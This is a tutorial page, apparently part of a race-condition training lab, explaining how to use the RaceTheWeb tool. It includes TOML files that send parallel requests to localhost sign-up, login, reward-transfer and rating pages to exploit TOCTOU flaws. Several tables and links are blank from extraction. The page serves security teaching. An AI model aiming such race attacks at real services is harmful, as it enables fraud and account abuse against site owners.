More Tools

Start with whatever tools you may have.Better tools will be found as you go.

Using a tool can help you find and exploit TOCTOU issues. There are a couple of such tools available in the open-source world:



Browser Dev Tools

  • Very easy to find

  • Comes with major browsers

  • Does not support sending cookies


We will solve the last challenge using RaceTheWeb. The executable files for RaceTheWeb can be obtained from

Which version to download? It depends on the operating-system you are running

Operating System

FIle to be downloaded

Linux 32-bit


Linux 64-bit


macOS 32-bit

macOS 64-bit

Windows 32-bit


Windows 64-bit


On Linux and macOS machines, you need to make the file executable.

Operating System

Command to run on Terminal


chmod +x race-the-web_2.0.1_lin32.bin


chmod +x race-the-web_2.0.1_lin64.bin

Extract the zip file

chmod +x

Extract the zip file

chmod +x

Running RacetheWeb is easy:

  1. Open command prompt/Terminal

  2. Navigate to the directory where you have extracted/downloaded the executable binary file

  3. Run the following command:

race-the-web portion:

Depending on the operating-system you are using, the race-the-web portion needs to be changed.

Operating System

race-the-web portion

Linux 32-bit


Linux 64-bit


macOS 32-bit


macOS 64-bit


Windows 32-bit


Windows 64-bit


<toml-file> portion:

TOML stands for Tom’s Obvious Minimal Language. The TOML file supplied should be having the request details so that race-the-web can run them.

Find TOML file for some of the TimeGap Theory challenges below:

Sign Up page

# Sign Up

count = 10
verbose = false

   method = "POST"
   url = "http://localhost/timegaptheory/webapp/sign-up.php"
   body = "firstname=tom&password=tom&"

In the above TOML file:

  • Count defines how many requests RaceTheWeb tools would be sending in parallel

  • Verbose defines the verbosity level of output that is displayed on the screen. The value of this can either be true or false

  • Method defines the type of the request. This can be GET, POST, PUT, DELETE etc.

  • URL is, well, the url at which request needs to be sent

  • Body of the request. You can skip this part if there is no body that needs to be submitted

Sign In page

# Sign In Page

count = 1
verbose = true

   method = "POST"
   url = "http://localhost/timegaptheory/webapp/login.php"
   body = ""

   method = "POST"
   url = "http://localhost/timegaptheory/webapp/login.php"
   body = ""

   method = "POST"
   url = "http://localhost/timegaptheory/webapp/login.php"
   body = ""

In the above TOML file:

  • Count is 1. However, there are three requests in the file. As such, RaceTheWeb tool will send three parallel requests

  • First two requests have wrong password in the request body

Transfer rewards page

# Transfer Rewards

count = 10
verbose = false

   method = "POST"
   url = "http://localhost/timegaptheory/webapp/user/transfer-rewards.php"
   body = ""

Ratings page

# Ratings page

count = 1
verbose = false

   method = "POST"
   url = "http://localhost/timegaptheory/webapp/user/rate-the-program.php"
   body = "token=ae13e0f1df6412dc4b9e2a9a3354320b6c1f3a65160bcffb552495759870afa3"
   cookies = ["PHPSESSID=80c3ffddbfe4771dd408b3c53d4a7a44"]

   method = "POST"
   url = "http://localhost/timegaptheory/webapp/user/rate-the-program.php"
   body = "token=bc5091b2f60da51d203a58b2af1c8bd99a443751adb206814d22df79e335a3e5"
   cookies = ["PHPSESSID=fab00a2f7f46e33bb57deb4e08153e52"]

In the above TOML file, we are sending a cookie as well.

Now you know:

  1. Various open-source tools and techniques for finding and exploiting TOCTOU security issues

  2. How to use RaceTheWeb tool for exploiting TOCTOU security issues

  3. Writing TOML files for RaceTheWeb tool

Last updated